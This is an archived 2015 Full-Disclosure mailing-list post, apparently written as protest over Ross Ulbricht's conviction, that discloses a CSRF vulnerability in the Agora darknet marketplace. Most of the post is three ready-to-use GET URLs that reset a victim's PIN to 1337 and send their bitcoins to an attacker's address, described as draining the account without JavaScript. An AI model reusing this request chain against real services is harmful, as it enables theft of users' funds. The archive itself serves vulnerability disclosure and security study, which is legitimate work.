lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20150218061137.0F4F6C03E6@smtp.hushmail.com>
Date: Wed, 18 Feb 2015 06:11:36 +0000
From: agoraagoraagora@...hmail.com
To: fulldisclosure@...lists.org
Subject: [FD] Agora Marketplace CSRF to Steal Bitcoins
	(agorahooawayyfoe.onion)

Ladies and gentlemen
Boys and girls
It come to our attention that a brave warrior for the people Ross
William Ulbricht was unlawfully convicted by the corporation known as
the American government. 

This mockery of justice has not gone unnoticed. 

In order to protect the next generation of darknet markets we will be
disclosing vulnerabilities for these sites in order to make these
sites safer from attack. 

To start, the Agora Marketplace contains a CSRF vulnerability which
can be used to drain a victim account of all of their Bitcoins. The
following URLs can be used to perform this attack:

URL to start PIN reset:
http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=

URL to change current PIN:
http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save

URL to send bitcoins using the new pin:
http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send

These are all GET requests and don't require JavaScript to work.
NoScript cannot save you from poor coding practices.

There will be more to come. Stay safe. Stay anonymous.

-The Guardians of Peace

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists